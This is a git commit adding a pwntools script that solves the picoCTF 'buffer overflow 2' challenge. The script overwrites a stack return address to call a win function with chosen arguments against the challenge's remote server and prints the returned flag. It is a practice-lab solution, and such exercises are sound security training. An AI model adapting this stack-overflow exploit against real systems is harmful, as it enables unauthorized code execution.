buffer overflow 2

2025-12-20 21:23:48 +01:00
parent 2359a500a2
commit 13815ed351
5 changed files with 245 additions and 0 deletions
--- a/buffer_overflow_2/sol.py
+++ b/buffer_overflow_2/sol.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python
+from pwn import *
+context.terminal = "kitty"
+
+win_address = 0x08049296
+
+buffer_base = 0xfffe422c
+ret_location = 0xfffe429c
+ret_offset = ret_location - buffer_base
+
+ebp_offset = 112
+arg1 = 0xCAFEF00D
+arg2 = 0xF00DF00D
+
+conn = remote("saturn.picoctf.net", 56706)
+#conn = process("./vuln")
+#attach(conn)
+
+conn.recvline()
+conn.writeline(flat({ebp_offset+0x8:arg1, ebp_offset+0xc:arg2, ret_offset:win_address}, word_size=32))
+conn.recvline()
+rest = conn.recvuntil(b'}')
+log.info(f"got {rest}")
+